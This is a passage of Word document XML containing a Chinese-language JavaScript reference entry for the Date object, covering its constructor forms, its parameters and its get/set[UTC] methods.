      </w:pPr>
      <w:r>
        <w:t>异常</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>TypeError</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>调用该方法时，如果对象不是</w:t>
      </w:r>
      <w:r>
        <w:t>Boolean</w:t>
      </w:r>
      <w:r>
        <w:t>类型，则抛出该异常。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="603" w:name="Date"/>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:bookmarkEnd w:id="603"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>操作日期和时间</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Date()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>new Date(milliseconds)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>new Date(datestring)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>new Date(year,month,day,hours,minutes,seconds,ms)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>不带参数时，</w:t>
      </w:r>
      <w:r>
        <w:t>Date()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数将根据当前日期和时间创建一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象。当传入一个数字参数时，这个数字将当做日期的内部数字表示形式，单位为毫秒，值等于对应的</w:t>
      </w:r>
      <w:r>
        <w:t>getTime()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的返回值。当传入一个</w:t>
      </w:r>
      <w:r>
        <w:t>字符串参数时，它将当做日期的字符串表示形式，格式为</w:t>
      </w:r>
      <w:r>
        <w:t>Date.parse()</w:t>
      </w:r>
      <w:r>
        <w:t>方法可接受的格式。在其他情况下，应该向构造函数传入</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t>个数字参数，用于指定日期及时间的各个字段。除了前两个参数（指定年以及月的范围），其余参数都是可选的。注意，这些日期和时间值是使用本地时间指定的，而不是国际协调时间</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>UTC</w:t>
      </w:r>
      <w:r>
        <w:t>）（与格林尼治标准时间</w:t>
      </w:r>
      <w:r>
        <w:t>[GMT]</w:t>
      </w:r>
      <w:r>
        <w:t>）类似）。替代方案可参阅静态方法</w:t>
      </w:r>
      <w:r>
        <w:t>Date.UTC()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Date()</w:t>
      </w:r>
      <w:r>
        <w:t>也可以不带</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>操作符，像一个函数一样调用。以这种方式调用时，</w:t>
      </w:r>
      <w:r>
        <w:t>Date()</w:t>
      </w:r>
      <w:r>
        <w:t>将忽略掉所有传入的参数，并返回当前日期</w:t>
      </w:r>
      <w:r>
        <w:t>和时间的一个字符串表示。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>milliseconds</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>需要的时间与</w:t>
      </w:r>
      <w:r>
        <w:t>1970</w:t>
      </w:r>
      <w:r>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>月</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>日午夜（</w:t>
      </w:r>
      <w:r>
        <w:t>UTC</w:t>
      </w:r>
      <w:r>
        <w:t>）之间的毫秒数。例如，传入参数</w:t>
      </w:r>
      <w:r>
        <w:t>5000</w:t>
      </w:r>
      <w:r>
        <w:t>将创建一个表示</w:t>
      </w:r>
      <w:r>
        <w:t>1970-01-01</w:t>
      </w:r>
      <w:r>
        <w:t>午夜之后</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>秒钟的日期。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>datestring</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个以字符串形式定义日期（以及时间，可选）的参数。这个字符串应当为</w:t>
      </w:r>
      <w:r>
        <w:t>Date.parse()</w:t>
      </w:r>
      <w:r>
        <w:t>可接受的一种格式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>year</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>年份，</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>位数字。例如，</w:t>
      </w:r>
      <w:r>
        <w:t>2001</w:t>
      </w:r>
      <w:r>
        <w:t>代表</w:t>
      </w:r>
      <w:r>
        <w:t>2001</w:t>
      </w:r>
      <w:r>
        <w:t>年。为了与早期实现的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>兼容，如果这个参数的值在</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>99</w:t>
      </w:r>
      <w:r>
        <w:t>之间，则向它加上</w:t>
      </w:r>
      <w:r>
        <w:t>1900</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>month</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>月份，介于</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>月）～</w:t>
      </w:r>
      <w:r>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:t>月）之间的一个整数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>day</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>月份中的第几天，介于</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>31</w:t>
      </w:r>
      <w:r>
        <w:t>之间的一个整数。注意这个参数使用</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>作为最小的值，而其他参数使用</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>作为最小的值。可选的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>hours</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>小时，</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>（午夜）～</w:t>
      </w:r>
      <w:r>
        <w:t>23</w:t>
      </w:r>
      <w:r>
        <w:t>（晚上</w:t>
      </w:r>
      <w:r>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:t>点）之间的整数。可选的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>minutes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>小时中的分钟，</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>59</w:t>
      </w:r>
      <w:r>
        <w:t>之间的整数。可选的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>seconds</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>分钟里的秒数，</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>59</w:t>
      </w:r>
      <w:r>
        <w:t>之间的整数。可选的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ms</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>秒中的毫秒数，</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>999</w:t>
      </w:r>
      <w:r>
        <w:t>之间的整数。可选的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象没有可以直接读</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>写的属性，所有对日期及时间值的访问都需要通过方法。</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象的大多数方法分为两种形式：一种</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>使用本地时间；另一种使用世界时间（</w:t>
      </w:r>
      <w:r>
        <w:t>UTC</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>GMT</w:t>
      </w:r>
      <w:r>
        <w:t>）。如果一个方法的名字中有</w:t>
      </w:r>
      <w:r>
        <w:t>"UTC"</w:t>
      </w:r>
      <w:r>
        <w:t>，则它使用世界时间进行操作。这些方法对在下面一起列出了。例如，列表</w:t>
      </w:r>
      <w:r>
        <w:t>get[UTC]Day()</w:t>
      </w:r>
      <w:r>
        <w:t>同时代表</w:t>
      </w:r>
      <w:r>
        <w:t>getDay()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>getUTCDay()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>的方法只能在</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象上调用，如果试图在其他类型的对象上调用它们，将抛出</w:t>
      </w:r>
      <w:r>
        <w:t>TypeError</w:t>
      </w:r>
      <w:r>
        <w:t>异常。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>get[UTC]Date()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象的月份中的日期值，本地或世界时间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>get[UTC]Day()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象的一周中的日期值</w:t>
      </w:r>
      <w:r>
        <w:t>，本地或世界时间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>get[UTC]FullYear()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回日期的年份，完整的</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>位数字的格式，本地或世界时间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>get[UTC]Hours()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象的小时值，本地或世界时间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>get[UTC]Milliseconds()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象的毫秒值，本地或世界时间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>get[UTC]Minutes()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象的分钟值，本地或世界时间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>get[UTC]Month()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象的月份值，本地或世界时间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>get[UTC]Seconds()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象的秒数值，本地或世界时间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>getTime()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象的内部毫秒表示形式。注意这个值与时区无关，因此，没有一个单独的</w:t>
      </w:r>
      <w:r>
        <w:t>getUTCTime()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>getTimezoneOffset()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回当前日期的本地表示与</w:t>
      </w:r>
      <w:r>
        <w:t>UTC</w:t>
      </w:r>
      <w:r>
        <w:t>表示之间相差的分钟数。注意返回值依赖于指定日期的夏令时是否有效。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>getYear()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象的年份值。这个方法已经过时，建议使用</w:t>
      </w:r>
      <w:r>
        <w:t>getFullYear()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>set[UTC]Date()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>设置日期的月份的日期值，使用本地或世界时间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>set[UTC]FullYear()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>设置日期的年份（以及可选的月份及日期）值，使用本地或世界时间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>set[UTC]Hours()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>设置日期的小时值（以及可选的分钟、秒以及毫秒值），使用本地或世界时间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>set[UTC]Milliseconds()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>设置日期的毫秒值，使用本地或世界时间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>set[UTC]Minutes()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>设置日期的分钟值（以及可选的秒以及毫秒值），使用地本或世界时间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>set[UTC]Month()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>设置日期的月份值（以及可选的月份中的天数），使用本地或世界时间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>set[UTC]Se</w:t>
      </w:r>
      <w:r>
        <w:t>conds()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
